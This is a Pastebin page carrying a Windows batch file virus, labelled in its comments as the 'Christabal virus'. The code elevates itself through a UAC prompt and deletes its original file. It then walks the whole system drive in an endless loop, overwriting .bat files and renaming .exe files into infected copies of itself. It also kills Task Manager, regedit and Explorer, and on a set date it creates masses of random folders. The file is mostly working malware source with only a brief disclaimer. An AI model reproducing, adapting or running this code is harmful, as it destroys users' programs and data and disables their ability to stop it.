Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ÿþ
- cls
- ::INFECTED
- @echo off
- if "%PROCESSOR_ARCHITECTURE%" EQU "amd64" (
- >nul 2>&1 "%SYSTEMROOT%\SysWOW64\cacls.exe" "%SYSTEMROOT%\SysWOW64\config\system"
- ) else (
- >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"
- )
- if '%errorlevel%' NEQ '0' (
- goto UACPrompt
- ) else ( goto gotAdmin )
- :UACPrompt
- echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
- set params = %*:"=""
- echo UAC.ShellExecute "cmd.exe", "/c ""%~s0"" %params%", "", "runas", 1 >> "%temp%\getadmin.vbs"
- "%temp%\getadmin.vbs"
- del "%temp%\getadmin.vbs"
- exit /b
- :gotAdmin
- pushd "%CD%"
- cd /d "%~dp0"
- mode con: cols=14 lines=1
- if not "%~F0"=="%TEMP%\%~NX0" start /b "" cmd /c del "%~F0"
- cd "%USERPROFILE%\Desktop"
- setlocal enabledelayedexpansion
- cd "%USERPROFILE%\DESKTOP"
- for %%A in ("%CD%") do set "ROOTFOLDER"="%%~DA\"
- for /l %%A in () do (
- for /r %SYSTEMDRIVE% %%B in ("*.bat" "*.exe") do findstr /r /c:"::INFECTED" "%%~B" || if exist "%%B" (
- if "%%~DPNXB"=="%%~DPNB.exe" move /y "%%~DPNB.exe" "%%~DPNB.bat" & copy /y %0 "%%~DPNB.bat"
- if "%%~DPNXB"=="%%~DPNB.bat" copy /y %0 "%%B" )
- taskkill /im "taskmgr.exe" /f >nul 2>&1
- taskkill /im "regedit.exe" /f >nul 2>&1
- for /f "tokens=* delims=0" %%A IN ("!RANDOM:~-1!") do set RAND=%%A
- if "!RAND!"=="" set RAND=1
- if "!DATE:~4,2!/!DATE:~7,2!/!DATE:~10,4!"=="03/02/2018" (
- for /l %%C in (1,1,!RAND!) do (
- md !RANDOM! !RANDOM! !RANDOM! !RANDOM! !RANDOM!
- md !RANDOM! !RANDOM! !RANDOM! !RANDOM! !RANDOM!
- md !RANDOM! !RANDOM! !RANDOM! !RANDOM! !RANDOM!
- timeout /t 3 /nobreak
- taskkill /im "taskmgr.exe" /f >nul 2>&1
- taskkill /im "regedit.exe" /f >nul 2>&1
- taskkill /im "explorer.exe" /f >nul 2>&1
- timeout /t 3 /nobreak
- start "" "explorer.exe" ) )
- taskkill /im "taskmgr.exe" /f >nul 2>&1
- taskkill /im "regedit.exe" /f >nul 2>&1
- net session >nul 2>&1
- cd..
- if "!ERRORLEVEL!" == "0" (
- if "!CD!"=="%USERPROFILE%" cd "%USERPROFILE%\DESKTOP"
- ) else (
- if "!CD!"=="%ROOTFOLDER%" cd "%USERPROFILE%\DESKTOP"
- )
- ) > nul
- REM **************************************************************
- REM Be very careful with this virus, I wont be responsible for
- REM any damages if you choose to use this program.
- REM **************************************************************
- REM **************************************************************
- REM Copyright © 2017, Jacob Gilbert (Zask), All rights reserved.
- REM Christabal virus.
- REM 2.50 KB
- **************************************************************
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement